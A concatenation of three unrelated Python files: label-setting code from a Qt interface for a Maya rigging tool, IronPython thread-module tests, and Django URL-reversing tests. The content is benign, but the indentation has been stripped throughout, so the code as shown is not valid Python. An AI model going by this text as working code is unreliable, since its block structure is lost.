self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_6), QtCompat.translate("MainWindow", "Shape", None, -1))
self.constraints_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.constraints_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_7), QtCompat.translate("MainWindow", "Const", None, -1))
self.connections_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.connections_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_5), QtCompat.translate("MainWindow", "Conn", None, -1))
self.driven_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.driven_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_9), QtCompat.translate("MainWindow", "Driven", None, -1))
self.custom_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.custom_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_10), QtCompat.translate("MainWindow", "Custom", None, -1))
self.locked_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.locked_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_11), QtCompat.translate("MainWindow", "Locked", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), QtCompat.translate("MainWindow", "Cards", None, -1))
self.label_5.setText(QtCompat.translate("MainWindow", "Shapes", None, -1))
self.label_11.setText(QtCompat.translate("MainWindow", "Surface Color", None, -1))
self.label_12.setText(QtCompat.translate("MainWindow", "Curve Color", None, -1))
self.label_13.setText(QtCompat.translate("MainWindow", "Shapes", None, -1))
self.label_14.setText(QtCompat.translate("MainWindow", "Shape Clipboard", None, -1))
self.copyShapes.setText(QtCompat.translate("MainWindow", "Copy to Second Selection", None, -1))
self.label_7.setText(QtCompat.translate("MainWindow", "Select CVs", None, -1))
self.select_cvs.setText(QtCompat.translate("MainWindow", "All", None, -1))
self.copyToCBBtn.setText(QtCompat.translate("MainWindow", "Copy", None, -1))
self.pasteLocalBtn.setText(QtCompat.translate("MainWindow", "Paste Local", None, -1))
self.pasteWorldBtn.setText(QtCompat.translate("MainWindow", "Paste World", None, -1))
self.select_band_edge_1.setText(QtCompat.translate("MainWindow", "Band Edge 1", None, -1))
self.mirrorShapes.setText(QtCompat.translate("MainWindow", "Mirror to Selected", None, -1))
self.mirrorSide.setText(QtCompat.translate("MainWindow", "Mirror All to Other Side", None, -1))
self.select_pin_head.setText(QtCompat.translate("MainWindow", "Pin Head", None, -1))
self.select_band_edge_2.setText(QtCompat.translate("MainWindow", "Band Edge 2", None, -1))
self.copyColor.setText(QtCompat.translate("MainWindow", "Copy Color", None, -1))
self.label_9.setText(QtCompat.translate("MainWindow", "Scale", None, -1))
self.minus_ten.setText(QtCompat.translate("MainWindow", "-10%", None, -1))
self.minus_one.setText(QtCompat.translate("MainWindow", "-1%", None, -1))
self.plus_one.setText(QtCompat.translate("MainWindow", "+1%", None, -1))
self.plus_ten.setText(QtCompat.translate("MainWindow", "+10%", None, -1))
self.label_10.setText(QtCompat.translate("MainWindow", "Rotate", None, -1))
self.rot_local_y.setText(QtCompat.translate("MainWindow", "Rotate Y 45", None, -1))
self.label_6.setText(QtCompat.translate("MainWindow", "Local", None, -1))
self.label_8.setText(QtCompat.translate("MainWindow", "World", None, -1))
self.rot_world_x.setText(QtCompat.translate("MainWindow", "Rotate X 45", None, -1))
self.rot_local_x.setText(QtCompat.translate("MainWindow", "Rotate X 45", None, -1))
self.rot_world_y.setText(QtCompat.translate("MainWindow", "Rotate Y 45", None, -1))
self.rot_local_z.setText(QtCompat.translate("MainWindow", "Rotate Z 45", None, -1))
self.rot_world_z.setText(QtCompat.translate("MainWindow", "Rotate Z 45", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.controller_edit), QtCompat.translate("MainWindow", "Controller Edit", None, -1))
self.unequipVisControl.setText(QtCompat.translate("MainWindow", "Unequip Vis Control", None, -1))
self.equipVisControl.setText(QtCompat.translate("MainWindow", "Equip Vis Control", None, -1))
self.pruneVisGroups.setText(QtCompat.translate("MainWindow", "Prune Unused Vis Groups", None, -1))
self.tagAsMain.setText(QtCompat.translate("MainWindow", "Tag as Main Control", None, -1))
self.label_3.setText(QtCompat.translate("MainWindow", "Assign to Group", None, -1))
self.label_4.setText(QtCompat.translate("MainWindow", "Level", None, -1))
self.assignVisGroup.setText(QtCompat.translate("MainWindow", "Assign", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_4), QtCompat.translate("MainWindow", "Vis Groups", None, -1))
self.spaceUp.setText(QtCompat.translate("MainWindow", " ^ ", None, -1))
self.spaceDown.setText(QtCompat.translate("MainWindow", " v ", None, -1))
self.label_17.setText(QtCompat.translate("MainWindow", "Multi Weights editor (doesn\'t work just yet)", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.space_tab), QtCompat.translate("MainWindow", "Space", None, -1))
self.menuTools.setTitle(QtCompat.translate("MainWindow", "Tools", None, -1))
self.menuVisibility.setTitle(QtCompat.translate("MainWindow", "Visibility", None, -1))
self.menuSettings.setTitle(QtCompat.translate("MainWindow", "Settings", None, -1))
self.actionCard_Orients.setText(QtCompat.translate("MainWindow", "Card Orients", None, -1))
self.actionReconnect_Real_Joints.setText(QtCompat.translate("MainWindow", "Reconnect Real Joints", None, -1))
self.actionCard_Orients_2.setText(QtCompat.translate("MainWindow", "Card Orients", None, -1))
self.actionConnectors.setText(QtCompat.translate("MainWindow", "Connectors", None, -1))
self.actionHandles.setText(QtCompat.translate("MainWindow", "Joint Handles", None, -1))
self.actionMatch_Selected_Orients.setText(QtCompat.translate("MainWindow", "Match Selected Orients", None, -1))
self.actionNaming_Rules.setText(QtCompat.translate("MainWindow", "Naming Rules", None, -1))
self.actionShow_Individual_Restores.setText(QtCompat.translate("MainWindow", "Show Individual Restores", None, -1))
self.actionShow_Card_Rig_State.setText(QtCompat.translate("MainWindow", "Show Card Rig State", None, -1))
from pdil.tool.fossil.cardlister import CardLister
from pdil.tool.fossil.cardparams import CardParams
from pdil.tool.fossil.jointlister import JointLister
|
|
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
from iptest.assert_util import *
import thread
import time
import sys
if not is_cpython:
from System import *
from System.Threading import *
@skip("win32")
def test_thread():
class Sync:
hit = 0
def ThreadProcParm(parm):
parm.hit = 1
def ThreadProcNoParm():
pass
def Main():
if not is_silverlight:
sync = Sync()
t = Thread(ParameterizedThreadStart(ThreadProcParm))
t.Start(sync)
t.Join()
Assert(sync.hit == 1)
t = Thread(ThreadStart(ThreadProcNoParm))
t.Start()
t.Join()
Main()
def import_sys():
import sys
Assert(sys != None)
t = Thread(ThreadStart(import_sys))
t.Start()
t.Join()
so = sys.stdout
se = sys.stderr
class myStdOut:
def write(self, text): pass
sys.stdout = myStdOut()
sys.stderr = myStdOut()
import thread
def raises(*p):
raise Exception
id = thread.start_new_thread(raises, ())
Thread.Sleep(1000) # wait a bit and make sure we don't get ripped.
sys.stdout = so
sys.stderr = se
def test_stack_size():
import sys
if is_cli or (sys.version_info[0] == 2 and sys.version_info[1] > 4) or sys.version_info[0] > 2:
import thread
size = thread.stack_size()
Assert(size==0 or size>=32768)
bad_size_list = [ 1, -1, -32768, -32769, -32767, -40000, 32767, 32766]
for bad_size in bad_size_list:
AssertError(ValueError, thread.stack_size, bad_size)
good_size_list = [4096*10, 4096*100, 4096*1000, 4096*10000]
for good_size in good_size_list:
#CodePlex Work Item 7827
if (is_cli or is_silverlight) and good_size<=50000: print "Ignoring", good_size, "for CLI"; continue
temp = thread.stack_size(good_size)
Assert(temp>=32768 or temp==0)
def temp(): pass
thread.start_new_thread(temp, ())
temp = thread.stack_size(1024*1024)
Assert(temp>=32768 or temp==0)
@skip("win32")
def test_new_thread_is_background():
"""verify new threads created during Python are background threads"""
import thread
global done
done = None
def f():
global done
done = Thread.CurrentThread.IsBackground
thread.start_new_thread(f, ())
while done == None:
Thread.Sleep(1000)
Assert(done)
@skip("silverlight")
def test_threading_waits_for_thread_exit():
import os
from iptest.process_util import launch
f = file('temp.py', 'w+')
try:
f.write("""
import sys
def f():
print 'bye bye'
def f(*args):
print 'bye bye'
sys.exitfunc = f
from threading import Thread
def count(n):
while n > 0:
n -= 1
print 'done'
t1 = Thread(target=count, args=(50000000,))
t1.start()
""")
f.close()
stdin, stdout = os.popen2(sys.executable + ' temp.py')
Assert('bye bye\n' in list(stdout))
finally:
import nt
nt.unlink('temp.py')
@skip("win32")
def test_thread_local():
import thread
x = thread._local()
#--Sanity
x.foo = 42
AreEqual(x.foo, 42)
global found
found = None
def f():
global found
found = hasattr(x, 'foo')
thread.start_new_thread(f, ())
while found == None:
Thread.Sleep(1000)
Assert(not found)
AreEqual(x.__dict__, {'foo': 42})
try:
x.__dict__ = None
Fail("Should not be able to set thread._local().__dict__!")
except AttributeError, e:
pass
try:
print x.bar
Fail("There is no 'bar' member on thread._local()")
except AttributeError, e:
pass
del x.foo
AreEqual(x.__dict__, {})
def test_start_new():
#--Sanity
global CALLED
CALLED = False
def tempFunc():
global CALLED
CALLED = 3.14
thread.start_new(tempFunc, ())
while CALLED==False:
print ".",
time.sleep(1)
AreEqual(CALLED, 3.14)
CALLED = False
def test_start_new_thread():
#--Sanity
global CALLED
CALLED = False
lock = thread.allocate()
def tempFunc(mykw_param=1):
global CALLED
lock.acquire()
CALLED = mykw_param
lock.release()
thread.exit_thread()
id = thread.start_new_thread(tempFunc, (), {"mykw_param":7})
while CALLED==False:
print ".",
time.sleep(1)
AreEqual(CALLED, 7)
id = thread.start_new_thread(tempFunc, (), {"mykw_param":8})
while CALLED!=8: #Hang forever if this is broken
print ".",
time.sleep(1)
#--Sanity Negative
global temp_stderr
temp_stderr = ""
se = sys.stderr
class myStdOut:
def write(self, text):
global temp_stderr
temp_stderr += text
try:
sys.stderr = myStdOut()
id = thread.start_new_thread(tempFunc, (), {"my_misspelled_kw_param":9})
time.sleep(5)
if not is_silverlight:
se.flush()
finally:
sys.stderr = se
AreEqual(CALLED, 8)
Assert("tempFunc() got an unexpected keyword argument 'my_misspelled_kw_param" in temp_stderr)
@skip("win32")
def test_thread_interrupt_main():
AssertError(NotImplementedError, thread.interrupt_main)
#------------------------------------------------------------------------------
run_test(__name__)
|
|
"""
Unit tests for reverse URL lookups.
"""
from __future__ import absolute_import
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.core.urlresolvers import (reverse, resolve, NoReverseMatch,
Resolver404, ResolverMatch, RegexURLResolver, RegexURLPattern)
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.shortcuts import redirect
from django.test import TestCase
from django.utils import unittest
from django.contrib.auth.models import User
from . import urlconf_outer, urlconf_inner, middleware, views
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/view_class/42/37/', 'view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/normal/42/37/', 'inc-normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/view_class/42/37/', 'inc-view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
('/included/mixed_args/42/37/', 'inc-mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
# Unnamed views will be resolved to the function/class name
('/unnamed/normal/42/37/', 'regressiontests.urlpatterns_reverse.views.empty_view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/unnamed/view_class/42/37/', 'regressiontests.urlpatterns_reverse.views.ViewClass', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', None, '', views.empty_view, ('42','37'), {}),
('/included/no_kwargs/42/37/', 'inc-no-kwargs', None, '', views.empty_view, ('42','37'), {}),
# Namespaces
('/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/ns-included1/normal/42/37/', 'inc-normal-view', None, 'inc-ns1', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
# Nested namespaces
('/ns-included1/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:inc-ns4:inc-ns2:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
# Namespaces capturing variables
('/inc70/', 'inner-nothing', None, 'inc-ns5', views.empty_view, tuple(), {'outer': '70'}),
('/inc78/extra/foobar/', 'inner-extra', None, 'inc-ns5', views.empty_view, tuple(), {'outer':'78', 'extra':'foobar'}),
)
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], dict(year=2007, month=5, day=21)),
('windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [], dict(drive_name='C', path=r'Documents and Settings\spam')),
('special', r'/special_chars/+%5C$*/', [r'+\$*'], {}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('insensitive', '/CaseInsensitive/fred', ['fred'], {}),
('test', '/test/1', [], {}),
('test2', '/test/2', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Regression for #9038
# These views are resolved by method name. Each method is deployed twice -
# once with an explicit argument, and once using the default value on
# the method. This is potentially ambiguous, as you have to pick the
# correct view for the arguments provided.
('kwargs_view', '/arg_view/', [], {}),
('kwargs_view', '/arg_view/10/', [], {'arg1':10}),
('regressiontests.urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/', [], {}),
('regressiontests.urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/10/', [], {'arg1':10}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
)
class NoURLPatternsTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.no_urls'
def test_no_urls_exception(self):
"""
RegexURLResolver should raise an exception when no urlpatterns exist.
"""
resolver = RegexURLResolver(r'^$', self.urls)
self.assertRaisesMessage(ImproperlyConfigured,
"The included urlconf regressiontests.urlpatterns_reverse.no_urls "\
"doesn't have any patterns in it", getattr, resolver, 'url_patterns')
class URLPatternReverse(TestCase):
urls = 'regressiontests.urlpatterns_reverse.urls'
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(expected, NoReverseMatch)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
self.assertRaises(NoReverseMatch, reverse, None)
class ResolverTests(unittest.TestCase):
def test_non_regex(self):
"""
Verifies that we raise a Resolver404 if what we are resolving doesn't
meet the basic requirements of a path to match - i.e., at the very
least, it matches the root pattern '^/'. We must never return None
from resolve, or we will get a TypeError further down the line.
Regression for #10834.
"""
self.assertRaises(Resolver404, resolve, '')
self.assertRaises(Resolver404, resolve, 'a')
self.assertRaises(Resolver404, resolve, '\\')
self.assertRaises(Resolver404, resolve, '.')
def test_404_tried_urls_have_names(self):
"""
Verifies that the list of URLs that come back from a Resolver404
exception contains a list in the right format for printing out in
the DEBUG 404 page with both the patterns and URL names, if available.
"""
urls = 'regressiontests.urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a non-existent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/non-existent-url')
url_types_names = [
[{'type': RegexURLPattern, 'name': 'named-url1'}],
[{'type': RegexURLPattern, 'name': 'named-url2'}],
[{'type': RegexURLPattern, 'name': None}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url3'}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url4'}],
[{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': None}],
[{'type': RegexURLResolver}, {'type': RegexURLResolver}],
]
try:
resolve('/included/non-existent-url', urlconf=urls)
self.fail('resolve did not raise a 404')
except Resolver404 as e:
# make sure we at least matched the root ('/') url resolver:
self.assertTrue('tried' in e.args[0])
tried = e.args[0]['tried']
self.assertEqual(len(e.args[0]['tried']), len(url_types_names), 'Wrong number of tried URLs returned. Expected %s, got %s.' % (len(url_types_names), len(e.args[0]['tried'])))
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
self.assertTrue(isinstance(t, e['type']), '%s is not an instance of %s' % (t, e['type']))
if 'name' in e:
if not e['name']:
self.assertTrue(t.name is None, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(t.name, e['name'], 'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name))
class ReverseLazyTest(TestCase):
urls = 'regressiontests.urlpatterns_reverse.reverse_lazy_urls'
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=301)
def test_user_permission_with_lazy_reverse(self):
user = User.objects.create_user('alfred', '[email protected]', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.login(username='alfred', password='testpw')
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
class ReverseShortcutTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.urls'
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj(object):
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertTrue(isinstance(res, HttpResponseRedirect))
self.assertEqual(res['Location'], '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertTrue(isinstance(res, HttpResponsePermanentRedirect))
self.assertEqual(res['Location'], '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res['Location'], '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res['Location'], '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res['Location'], '/headlines/2008.02.17/')
self.assertRaises(NoReverseMatch, redirect, 'not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res['Location'], '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res['Location'], 'http://example.com/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res['Location'], '/absolute_arg_view/')
self.assertRaises(NoReverseMatch, redirect, absolute_kwargs_view, wrong_argument=None)
class NamespaceTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.namespace_urls'
def test_ambiguous_object(self):
"Names deployed via dynamic URL objects that require namespaces can't be resolved"
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view')
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', args=[37,42])
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', kwargs={'arg1':42, 'arg2':37})
def test_ambiguous_urlpattern(self):
"Names deployed via dynamic URL objects that require namespaces can't be resolved"
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing')
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', args=[37,42])
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', kwargs={'arg1':42, 'arg2':37})
def test_non_existent_namespace(self):
"Non-existent namespaces raise errors"
self.assertRaises(NoReverseMatch, reverse, 'blahblah:urlobject-view')
self.assertRaises(NoReverseMatch, reverse, 'test-ns1:blahblah:urlobject-view')
def test_normal_name(self):
"Normal lookups work as expected"
self.assertEqual('/normal/', reverse('normal-view'))
self.assertEqual('/normal/37/42/', reverse('normal-view', args=[37,42]))
self.assertEqual('/normal/42/37/', reverse('normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/+%5C$*/', reverse('special-view'))
def test_simple_included_name(self):
"Normal lookups work on names included from other patterns"
self.assertEqual('/included/normal/', reverse('inc-normal-view'))
self.assertEqual('/included/normal/37/42/', reverse('inc-normal-view', args=[37,42]))
self.assertEqual('/included/normal/42/37/', reverse('inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/included/+%5C$*/', reverse('inc-special-view'))
def test_namespace_object(self):
"Dynamic URL objects can be found using a namespace"
self.assertEqual('/test1/inner/', reverse('test-ns1:urlobject-view'))
self.assertEqual('/test1/inner/37/42/', reverse('test-ns1:urlobject-view', args=[37,42]))
self.assertEqual('/test1/inner/42/37/', reverse('test-ns1:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/test1/inner/+%5C$*/', reverse('test-ns1:urlobject-special-view'))
def test_embedded_namespace_object(self):
"Namespaces can be installed anywhere in the URL pattern tree"
self.assertEqual('/included/test3/inner/', reverse('test-ns3:urlobject-view'))
self.assertEqual('/included/test3/inner/37/42/', reverse('test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/included/test3/inner/42/37/', reverse('test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/included/test3/inner/+%5C$*/', reverse('test-ns3:urlobject-special-view'))
def test_namespace_pattern(self):
"Namespaces can be applied to include()'d urlpatterns"
self.assertEqual('/ns-included1/normal/', reverse('inc-ns1:inc-normal-view'))
self.assertEqual('/ns-included1/normal/37/42/', reverse('inc-ns1:inc-normal-view', args=[37,42]))
self.assertEqual('/ns-included1/normal/42/37/', reverse('inc-ns1:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/+%5C$*/', reverse('inc-ns1:inc-special-view'))
def test_namespace_pattern_with_variable_prefix(self):
"When using a include with namespaces when there is a regex variable in front of it"
self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42}))
self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', args=[42]))
self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42, 'arg1': 37, 'arg2': 4}))
self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', args=[42, 37, 4]))
self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', kwargs={'outer':42}))
self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', args=[42]))
def test_multiple_namespace_pattern(self):
"Namespaces can be embedded"
self.assertEqual('/ns-included1/test3/inner/', reverse('inc-ns1:test-ns3:urlobject-view'))
self.assertEqual('/ns-included1/test3/inner/37/42/', reverse('inc-ns1:test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/ns-included1/test3/inner/42/37/', reverse('inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:test-ns3:urlobject-special-view'))
def test_nested_namespace_pattern(self):
"Namespaces can be nested"
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view'))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/37/42/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/42/37/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view'))
def test_app_lookup_object(self):
"A default application namespace can be used for lookup"
self.assertEqual('/default/inner/', reverse('testapp:urlobject-view'))
self.assertEqual('/default/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42]))
self.assertEqual('/default/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/default/inner/+%5C$*/', reverse('testapp:urlobject-special-view'))
def test_app_lookup_object_with_default(self):
"A default application namespace is sensitive to the 'current' app can be used for lookup"
self.assertEqual('/included/test3/inner/', reverse('testapp:urlobject-view', current_app='test-ns3'))
self.assertEqual('/included/test3/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42], current_app='test-ns3'))
self.assertEqual('/included/test3/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='test-ns3'))
self.assertEqual('/included/test3/inner/+%5C$*/', reverse('testapp:urlobject-special-view', current_app='test-ns3'))
def test_app_lookup_object_without_default(self):
"An application namespace without a default is sensitive to the 'current' app can be used for lookup"
self.assertEqual('/other2/inner/', reverse('nodefault:urlobject-view'))
self.assertEqual('/other2/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42]))
self.assertEqual('/other2/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/other2/inner/+%5C$*/', reverse('nodefault:urlobject-special-view'))
self.assertEqual('/other1/inner/', reverse('nodefault:urlobject-view', current_app='other-ns1'))
